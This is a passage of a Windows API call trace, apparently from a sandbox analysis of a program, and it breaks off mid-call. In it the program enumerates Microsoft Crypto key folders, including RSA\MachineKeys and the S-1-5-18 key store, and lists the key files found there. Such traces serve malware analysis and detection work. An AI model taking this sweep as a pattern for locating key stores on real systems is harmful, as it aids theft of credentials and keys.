(in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.500] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpFilePart=0x0) returned 0x24 [0133.500] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\", lpFilePart=0x0) returned 0x25 [0133.500] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.654] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.654] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0133.655] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.655] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpFilePart=0x0) returned 0x24 [0133.655] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\", lpFilePart=0x0) returned 0x25 [0133.655] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.655] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.656] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0133.656] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.656] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpFilePart=0x0) returned 0x23 [0133.656] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\", lpFilePart=0x0) returned 0x24 [0133.656] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.657] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.657] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0133.657] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0133.657] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 0 [0133.658] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.658] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpFilePart=0x0) returned 0x23 [0133.658] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\", lpFilePart=0x0) returned 0x24 [0133.658] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.658] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.659] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0133.659] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0133.659] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.659] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.659] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpFilePart=0x0) returned 0x2f [0133.659] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\", lpFilePart=0x0) returned 0x30 [0133.660] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.660] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.660] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0133.660] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.661] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpFilePart=0x0) returned 0x2f [0133.661] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\", lpFilePart=0x0) returned 0x30 [0133.661] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.661] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.661] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0133.662] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.663] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpFilePart=0x0) returned 0x2c [0133.663] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpFilePart=0x0) returned 0x2d [0133.663] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.712] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.712] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xfc767af0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xfc767af0, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc767af0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="6D14E4~1")) returned 1 [0133.713] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe5bc2f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x41d, dwReserved0=0x0, dwReserved1=0x0, cFileName="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="D42CC0~1")) returned 1 [0133.713] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.713] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.713] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpFilePart=0x0) returned 0x2c [0133.713] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpFilePart=0x0) returned 0x2d [0133.713] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.714] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.714] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xfc767af0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xfc767af0, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc767af0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="6D14E4~1")) returned 1 [0133.714] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe5bc2f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x41d, dwReserved0=0x0, dwReserved1=0x0, cFileName="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="D42CC0~1")) returned 1 [0133.714] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe5bc2f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x41d, dwReserved0=0x0, dwReserved1=0x0, cFileName="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="D42CC0~1")) returned 0 [0133.715] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0133.715] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage", lpFilePart=0x0) returned 0x25 [0133.715] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\", lpFilePart=0x0) returned 0x26 [0133.715] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x691f154 | out: 